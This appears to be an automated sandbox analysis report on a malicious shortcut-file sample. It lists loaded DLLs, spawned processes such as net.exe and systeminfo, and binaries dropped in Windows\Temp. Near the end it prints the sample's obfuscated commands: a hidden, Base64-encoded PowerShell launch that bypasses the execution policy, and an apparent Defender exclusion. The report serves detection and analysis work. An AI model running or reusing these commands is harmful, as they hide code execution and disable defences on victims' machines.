Source: C:\Windows\Temp\svczHost.exe	Section loaded: winnsi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: sspicli.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: schannel.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: msasn1.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: version.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: icu.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winhttp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: mswsock.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wshunix.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winrnr.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wshbth.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: devobj.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: napinsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winsta.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: userenv.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: profapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: sspicli.dll
Source: C:\Windows\regedit.exe	Section loaded: authz.dll
Source: C:\Windows\regedit.exe	Section loaded: aclui.dll
Source: C:\Windows\regedit.exe	Section loaded: ulib.dll
Source: C:\Windows\regedit.exe	Section loaded: clb.dll
Source: C:\Windows\regedit.exe	Section loaded: uxtheme.dll
Source: C:\Windows\regedit.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\regedit.exe	Section loaded: xmllite.dll
Source: C:\Windows\regedit.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll

Source: C:\Windows\System32\systeminfo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Directory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: MdmRznA6gx.lnk

Static file information: File size 38797312 > 1048576

Source:	Binary string: n.pdb source: powershell.exe, 00000008.00000002.3584448259.0000028E773E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.3584448259.0000028E773E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbV source: powershell.exe, 00000008.00000002.3586894637.0000028E77603000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rlib.pdb source: powershell.exe, 00000008.00000002.3586894637.0000028E77603000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb! source: powershell.exe, 00000008.00000002.3584448259.0000028E773E7000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String("M2MwUmxabVZ1WkdWeUlDMXVaU0FrYm5Wc2JDa2dldzBLSUNBZ0lDUnBjMUoxYm01cGJtY2dQU0FrZEhKMVpUc05DaUFnSUNCQlpHUXRUWEJRY21WbVpYSmxibU5sSUMxRmVHTnNkWE5wYjI1UVlYUm9JQ0pET2x4WGFXNWtiM2R6WEZSbGJYQW

PowerShell case anomaly found

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /v /k "powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="" && exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="	Jump to behavior

Suspicious powershell command line found

